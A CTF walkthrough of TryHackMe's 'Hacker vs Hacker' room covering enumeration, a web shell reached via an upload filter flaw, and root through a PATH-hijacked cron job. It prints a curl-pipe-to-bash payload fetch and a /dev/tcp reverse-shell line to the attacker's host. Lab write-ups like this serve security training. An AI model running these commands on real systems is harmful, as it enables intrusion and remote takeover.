TryHackMe CTF Hacker vs Hacker

TryHackMe CTF Hacker vs Hacker

Hello guys back again with another walkthrough this time we are going to get our hands dirty on CTF (Hacker vs. Hacker) from TryHackMe.

No alt text provided for this image

Enumeration through NMAP:

nmap -sV -sC -Pn -A 10.10.168.53 -o nmap        
No alt text provided for this image

We have 2 ports open

  1. SSH (secure shell) which normally requires authentication
  2. HTTP (Hyper Text Transfer protocol) Normally a website

Now let's check website

No alt text provided for this image

Now got to the page source of this website and check the source code if we find anything malicious

No alt text provided for this image

Here we have find the /cvs directory, check this directory

No alt text provided for this image

Now go back to the home page of this website

Scrolling down we get a CV upload functionality.

No alt text provided for this image

We always know that if a website has file upload capability many time they are set up correctly but by chance sometimes you might be lucky and discover a misconfigured website.

Next I decided to begin testing file upload functionality to see if i could find any security misconfiguration that it might have. I decided to begin by just uploading a plain text file.

No alt text provided for this image

I create a simple text file now I'm uploading it to the website

After uploading file on to the website i got

No alt text provided for this image

Now check the page source what we get in the back-end

No alt text provided for this image

Looking at the screenshot above we notice that there is some source code disclosure. The application is using strpos() on file extension to determine whether an uploaded file is a pdf or not.

Enumeration Through Gobuster:

Now I start directory searching?using go buster

Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains

gobuster dir -u https://10.10.168.53/cvs/ -w /home/zkwan/Git/SecLists/Discovery/Web-Content/common.txt?-x .pdf.php -t 50        
No alt text provided for this image

From gibuster result here we got /shell.pdf.php

Now check it on website

No alt text provided for this image

here we got access to the /shell.pdf.php

Basic PHP Enumeration

Now I check basic PHP enumeration using cmd the following

/shell.pdf.php?cmd=id

No alt text provided for this image

So it is vulnerable to command injection. Now lets get a reverse shell.

Initial Foothold:

Create Reverse Shell

No alt text provided for this image

Here the above IP is from my VPN. Copy this?PHP one liner and create ka file with this code.

No alt text provided for this image

Now start the python webserver to upload this reverse shell to the website

No alt text provided for this image

Now start nc listener on another tab

No alt text provided for this image

Goto website and type the folowing cmd in the URL

cmd=curl https://10.8.78.190:8080/revshell.sh | bash

No alt text provided for this image

Check you nc listener there you will get Reverse shell

No alt text provided for this image

As you can see in the above picture i'm able to get the user flag

Privilege Escalation:

I went looking through the lachlan directory and noticed the .bash_history

No alt text provided for this image

Upon enumerating that, I found a few commands had been run:

No alt text provided for this image

The password for user lachlan was changed with echo -e command.

Looking at /etc/cron.d/persistence, we can maybe get backup.sh to run as root every minute.

No alt text provided for this image

Looking at the cronjob file we notice a vulnerability that leads to remote code execution. The PATH variable is used to determine where exactly the binaries are going to be called from

The program will first go to /home/lachlan/bin to search for the binaries followed by /bin and lastly /usr/bin

Since we have read and write privileges on /home/lachlan/bin we can just drop our binary and wherever root runs the cronjob he’ll execute our binary instead of the real binary. But Looking the the cronjob again we notice that some binaries are using absolute paths meaning they cannot be hijacked but pkill is using a relative path

we can just login to the system and upload a malicious binary to /home/lachlan/bin which when executed will give us a root shell.

Now login with ssh

No alt text provided for this image

But the SSH session keeps getting terminated after a few seconds this is due to a cronjob that’s running as root

Now exit this session and start netcat listener on port 4545:

No alt text provided for this image

Now login again via ssh

After login?executed the below command before being kicked out by the cronjobn

echo "bash -c 'bash -i >& /dev/tcp/10.8.78.190/4545 0>&1'" > bin/pkill ; chmod +x bin/pkill        
No alt text provided for this image

Check you netcat listener there you will get reverse shell as root

No alt text provided for this image

That's all guys the CTF is done. We have successfully capture two flags one is from user access and other is from root access.

I hope you enjoyed the walkthrough if so like for me down below and follow me as well so that you won’t miss any upcoming future walkthroughs.

Zabeehullah Abid

Enterprise Architect, CCSP | TOGAF | CHFI | CEH | DevSecOps

2 年

Stay committed. ??

要查看或添加评论,请登录

Zakwan Abid的更多文章

  • Active Directory Exploitation Techniques

    Active Directory Exploitation Techniques

    In this AD network, I will cover several methods that can be used to exploit AD. This is by no means a complete list of…

  • TryHackMe CTF b3dr0ck

    TryHackMe CTF b3dr0ck

    Hello, guys back again with another walkthrough. This time we are going to get our hands dirty on CTF (b3dr0ck) from…

  • Active Directory Enumeration

    Active Directory Enumeration

    In this network, I will cover several methods that can be used to enumerate AD. This is by no means a complete list as…

    2 条评论
  • Linux Privilege Escalation Techniques

    Linux Privilege Escalation Techniques

    This write-up is based on the Linux PrivEsc room from Try Hack Me. Please find this room here:- https://tryhackme.

    1 条评论
  • Personal data from more than 533 Million Facebook users have been Leaked by hackers

    Personal data from more than 533 Million Facebook users have been Leaked by hackers

    In a massive data breach, the personal information of over 533 million Facebook users was leaked online. HIGHLIGHTS The…

    2 条评论

社区洞察

其他会员也浏览了